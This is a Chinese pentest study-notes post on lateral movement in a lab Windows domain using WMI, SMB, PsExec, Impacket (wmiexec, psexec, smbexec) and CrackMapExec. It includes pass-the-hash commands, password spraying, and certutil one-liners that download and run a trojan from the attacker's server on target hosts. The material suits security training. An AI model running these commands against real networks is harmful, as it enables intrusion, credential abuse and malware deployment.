第129天:内网安全-横向移动WmiSmbCrackMapExecProxyChainsImpacket
这里这个环境继续上一篇文章搭建的环境
案例一: 域横向移动-WMI-自带&命令&套件&插件
首先上线win2008
首先提权到system权限
wmic是windows自带的命令,可以通过135端口进行连接利用,只支持明文方式,优点是不用上传别的东西,缺点是无回显。
利用system权限抓取明文密码和hash密码
直接获得了域控管理员的账号密码
探测存活主机
进一步的信息收集上一篇文章写过
win2008开启监听并生成木马上传到本地web服务器
wmic
利用wmic命令去连接别的主机,让目标主机去下载木马
wmic /node:目标ip /user:账号 /password:密码 process call create "执行命令"
wmic /node:192.168.3.30 /user:administrator /password:admin@123 process call create "certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe"
连接成功一般只有这种显示
成功上传
让他执行
成功上线
缺点就是没有任何回显
cscript
项目地址:https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs
特点是会反弹一个新的窗口就导致没有办法在cs当中去运行,类似反弹shell,并且得借助一个vbs文件,且不支持hash
在3.20(win2008主机)上运行
cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com
弹过来的新窗口反弹的ip为3.30
wmiexec-impacket
下载地址
1、Py版:https://github.com/SecureAuthCorp/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 “ver”
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”2、Exe版:https://gitee.com/RichChigga/impacket-examples-windows
这种方式又拥有回显,又可以适配cs
生成代理节点
这里因为我是linux环境直接执行py文件,exe文件一个原理
wmiexec ./账号:密码@ip "命令"
wmiexec 域名/账号:密码@ip "命令"
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
尝试使用域控的hash进行连接
wmiexec -hashes :hash值 (域名或者.)/账号@192.168.3.40 "whoami"
执行上线
proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator@192.168.3.40 "certutil -urlcache -split -f h c:/222.exe & c:/222.exe"
案例二: 域横向移动-SMB-自带&命令&套件&插件
利用的是smb开放的445端口
命令
项目地址:PsTools - Sysinternals | Microsoft Learn
psexe也是反弹一个cmd所以不能直接在cs当中运行
windows官方用法
psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd
这里因为我是linux系统所以我直接把文件拖入win2008进行运行,并且运行该文件的时候cmd权限必须为admin,这里也可以用socks代理执行,并且权限已经是system可以执行。
20执行获得30的cmd
套件
使用套件中的psexec
wmi套件中
psexec.py ./administrator:123.com@192.168.3.30
psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.30
套件当中还有一个smbexec.py文件
python smbexec.py ./administrator:123.com@192.168.3.40
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30
同样也是会弹出一个新的cmd会话
cs自带
先需要设置转发上线,因为内网不出网
选择域控密码,或者主机密码
域控上线
利用psexec64+主机hash值上线win7
因为这里我所有主机都是一个密码,所以直接选这个,记得他会自动加上win2008的域,记得删除,然后就是提醒我们在内网渗透过程当中要尝试切换域内用户的登录方式,大部分会自动加上域
成功上线
案例三: 域横向移动-工具-Proxychains&CrackMapExec
这里proxychains我一直在用,不做过多介绍了
crackmapexec下载地址:(kali自带)GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks
基本用法
探测存活主机
crackmapexec smb 192.168.3.10-40 #探测存活主机
密码喷射域登录
crackmapexec smb 192.168.3.10-40 -u jie -p 123.com
这里由于我没有把密码和主机进行绑定,所以域内所有主机都可以用这个密码登录
密码喷射本地登录
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth
密码喷射本地登录加执行命令
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x "whoami"
尝试上线,记得设置转发上线,ip需要设置为内网ip
利用下面的命令下载web服务器中的木马,并尝试运行上线
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x "certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe & c:/zzzzz.exe"
除了域控主机之外都上线了,切换域控密码喷射
高阶玩法
当收集到一台域内主机以后,可以尝试把收集到的密码,用户都写入字典当中
注意收集用户的时候不能用提权的账户,需要用域内账户
这里密码我基本上都是123.com
运行,这里注意要加一个参数,不然运行一个成功匹配后就不会继续往下运行
--continue-on-success用字典密码去匹配
这个加continue参数好像只能够匹配密码,不能全上线,不加参数的话又指挥上线一个就掉了,不太懂了,可以匹配出来密码,用账号密码,一个一个去上线?
相关文章:
第129天:内网安全-横向移动WmiSmbCrackMapExecProxyChainsImpacket
这里这个环境继续上一篇文章搭建的环境 案例一: 域横向移动-WMI-自带&命令&套件&插件 首先上线win2008 首先提权到system权限 wmic是windows自带的命令,可以通过135端口进行连接利用,只支持明文方式,优点是不用上传别…...
ChatGPT教我将MySQL中where find_in_set改成PostgreSQL支持的写法
问题 之前使用Mybatis,在MySQL中使用如下SQL语句没有问题: SELECT * FROM dept WHERE find_in_set(5,dept_parent);现在切换到PostgreSQL,发现find_in_set函数不能使用。 解决 SELECT * FROM dept WHERE 5 ANY(string_to_array(dept_parent, ,));总…...
Python命令模式:掌控你的代码指令
Python命令模式:掌控你的代码指令 在软件工程的浩瀚海洋中,命令模式(Command Pattern)是一盏指引航向的明灯,它将请求或操作封装成对象,从而让代码更加灵活、可扩展。本文将深入探讨Python中的命令模式&am…...
电子产品 IPX7 防水级别测试的具体流程)
【物联网】(防水篇)电子产品 IPX7 防水级别测试的具体流程
电子产品 IPX7 防水级别测试的具体流程 1. 准备工作: - 准备一个足够大的浸水箱,确保水深至少为 1 米,以满足 IPX7 测试的标准要求。 - 将水温控制在标准温度范围内,通常在 15-35 摄氏度之间,以模拟正常使用环境。 2…...
Redis 实现消息队列
Redis 实现消息队列 文章目录 Redis 实现消息队列导引1. 基于List结构的消息队列2. 基于PubSub的消息队列3. 基于Stream的消息队列(推荐)3.1 XADD3.2 XREAD3.3 XGROUP 导引 消息队列(Message Queue),从概念上来理解就是用来存放消息的队列,最简单的消息…...
模板初阶(详解)
一、泛型编程 为了引出模板,我们来看下面代码,比如要实现不同类型的交换函数,如下: void Swap(int& a, int& b) {int c a;a b;b c; } void Swap(char& a, char& b) {char c a;a b;b c; } void Swap(doubl…...
对称加密算法解析:DES、AES及其在`pycryptodome` 和 `crypto-js` 模块中的应用
📚 对称加密算法解析:DES、AES及其在pycryptodome 和 crypto-js 模块中的应用 🗝️ DES 算法 算法原理 数据加密标准(DES)是一种对称密钥加密算法,用于保护数据的安全。DES 使用一个 56 位的密钥进行加密…...
C++设计模式(代理模式)
1. 电话虫 在海贼中,有一种神奇的通信工具叫做电话虫(Den Den Mushi),外形如蜗牛,身上带有斑点或条纹或通体纯色,壳顶上有对讲机或按键,不接通时会睡觉,接通时会惊醒,并发…...
Linux系统驱动(十三)Linux内核定时器
文章目录 一、内核定时器原理二、定时器API三、使用定时器让LED灯闪烁四、使用定时器对按键进行消抖 一、内核定时器原理 内核当前时间通过jiffies获取,它是内核时钟节拍数,在linux内核启动的时候,jiffies开始(按照一定频率&…...
Visual Studio 调试时加载符号慢
什么是调试符号 编译程序时生成的一组特殊字符,并包含有关变量和函数在生成的二进制文件中的位置以及其他服务信息的信息。 该数据集可用于逐步调试程序或检查第三方代码。 调试符号可以添加到可执行文件或库中,但是大多数现代编译器将它们存储为单独的…...
Spring Cloud Config:动态配置的魔法师
Spring Cloud Config:动态配置的魔法师 在微服务架构的浩瀚星海中,配置管理如同一颗璀璨的星辰,而Spring Cloud Config则是那颗能够实现配置信息集中管理和动态刷新的魔法星。本文将深入探索Spring Cloud Config的奥秘,揭示如何通…...
Webpack入门基础知识及案例
webpack相信大家都已经不陌生了,应用程序的静态模块打包工具。前面我们总结了vue,react入门基础知识,也分别做了vue3的实战小案例,react的实战案例,那么我们如何使用webpack对项目进行模块化打包呢? 话不多…...
对中国人工智能与国外人工智能的思考
作为一名语文老师,我在教育的领域中见证着时代的变迁,也关注着科技的发展,尤其是人工智能这一前沿领域。当我们将目光投向中国人工智能与国外人工智能的发展时,心中不禁涌起诸多思考。 中国的人工智能近年来犹如一颗璀璨的新星&am…...
【debian系统arm架构安装docker】且换源后依旧不行就离线导入镜像
安装docker 在Debian系统上安装Docker并使用阿里云的镜像源可以通过以下步骤完成 1.更新软件包索引 前置如果需要更换源的请移步 : 初始化配置(自动连wifi,自动开启SSH)换清华源,远程桌面连接 sudo apt-get update2.安装必要的软件包以允许apt通过HTTPS使用仓库 sudo apt-get …...
Readwise 官方 Obsidian 插件使用
Readwise 官方 Obsidian 插件简介 Obsidian 中的 Readwise 注释示例 阅读已经发布了官方插件来导入你的 Readwise 数据Obsidian 。如果你还没有使用过 Readwise,那么值得一看。Readwise 是我最喜欢的 应用之一。我每天都在用它。因此,将这些数据自动导…...
A. A+B Again?
time limit per test 1 second memory limit per test 256 megabytes Given a two-digit positive integer nn, find the sum of its digits. Input The first line contains an integer tt (1≤t≤901≤t≤90) — the number of test cases. The only line of each tes…...
pr样机模板视频素材|城市户外高速路广告牌视频样机
https://prmuban.com/40369.html pr样机素材,全高清实景城市户外高速路广告牌视频样机模板,适合宣传视频制作。 主要特点: Adobe Premiere Pro 2024 全高清分辨率(19201080) 易于使用 快速渲染 无需插件 预览中使用的…...
谷歌大中华区总裁:所有企业都在问这个问题
中国开发者对于出海的热情,令Google大中华区总裁陈俊廷感慨。2024 Google I/O Connect(2024Google开发者大会)期间,他在接受第一财经记者独家采访时提到一个细节:早上7:30,他来到会场时,人们已经…...
GPT-4o:AI视觉识别的革命性飞跃
在AI的宏伟叙事中,图像识别技术始终扮演着关键角色。随着技术的不断演进,AI的视界已超越了简单的图像内容识别,它现在能够将视觉信息转化为引人入胜的文字描述。OpenAI最新力作——GPT-4o模型,以其卓越的多模态理解能力࿰…...
将电脑打造成私人网盘,支持外网访问之详细操作教程
你想过把自己电脑打造成随时随地访问的网盘吗?就是那种拥有一个属于自己的影音库,不用担心被和谐,随时可以登录访问电脑上的各种文件,相比传统网盘省心又安全。 使用Everything和节点小宝将电脑搭建成私人网盘,可以实现…...
结构体的进阶应用)
基于算法竞赛的c++编程(28)结构体的进阶应用
结构体的嵌套与复杂数据组织 在C中,结构体可以嵌套使用,形成更复杂的数据结构。例如,可以通过嵌套结构体描述多层级数据关系: struct Address {string city;string street;int zipCode; };struct Employee {string name;int id;…...
Fabric V2.5 通用溯源系统——增加图片上传与下载功能
fabric-trace项目在发布一年后,部署量已突破1000次,为支持更多场景,现新增支持图片信息上链,本文对图片上传、下载功能代码进行梳理,包含智能合约、后端、前端部分。 一、智能合约修改 为了增加图片信息上链溯源,需要对底层数据结构进行修改,在此对智能合约中的农产品数…...
虚拟电厂发展三大趋势:市场化、技术主导、车网互联
市场化:从政策驱动到多元盈利 政策全面赋能 2025年4月,国家发改委、能源局发布《关于加快推进虚拟电厂发展的指导意见》,首次明确虚拟电厂为“独立市场主体”,提出硬性目标:2027年全国调节能力≥2000万千瓦࿰…...
C# 表达式和运算符(求值顺序)
求值顺序 表达式可以由许多嵌套的子表达式构成。子表达式的求值顺序可以使表达式的最终值发生 变化。 例如,已知表达式3*52,依照子表达式的求值顺序,有两种可能的结果,如图9-3所示。 如果乘法先执行,结果是17。如果5…...
高防服务器价格高原因分析
高防服务器的价格较高,主要是由于其特殊的防御机制、硬件配置、运营维护等多方面的综合成本。以下从技术、资源和服务三个维度详细解析高防服务器昂贵的原因: 一、硬件与技术投入 大带宽需求 DDoS攻击通过占用大量带宽资源瘫痪目标服务器,因此…...
前端开发者常用网站
Can I use网站:一个查询网页技术兼容性的网站 一个查询网页技术兼容性的网站Can I use:Can I use... Support tables for HTML5, CSS3, etc (查询浏览器对HTML5的支持情况) 权威网站:MDN JavaScript权威网站:JavaScript | MDN...
多元隐函数 偏导公式
我们来推导隐函数 z z ( x , y ) z z(x, y) zz(x,y) 的偏导公式,给定一个隐函数关系: F ( x , y , z ( x , y ) ) 0 F(x, y, z(x, y)) 0 F(x,y,z(x,y))0 🧠 目标: 求 ∂ z ∂ x \frac{\partial z}{\partial x} ∂x∂z、 …...
麒麟系统使用-进行.NET开发
文章目录 前言一、搭建dotnet环境1.获取相关资源2.配置dotnet 二、使用dotnet三、其他说明总结 前言 麒麟系统的内核是基于linux的,如果需要进行.NET开发,则需要安装特定的应用。由于NET Framework 是仅适用于 Windows 版本的 .NET,所以要进…...
渗透实战PortSwigger Labs指南:自定义标签XSS和SVG XSS利用
阻止除自定义标签之外的所有标签 先输入一些标签测试,说是全部标签都被禁了 除了自定义的 自定义<my-tag onmouseoveralert(xss)> <my-tag idx onfocusalert(document.cookie) tabindex1> onfocus 当元素获得焦点时(如通过点击或键盘导航&…...
鸿蒙Navigation路由导航-基本使用介绍
1. Navigation介绍 Navigation组件是路由导航的根视图容器,一般作为Page页面的根容器使用,其内部默认包含了标题栏、内容区和工具栏,其中内容区默认首页显示导航内容(Navigation的子组件)或非首页显示(Nav…...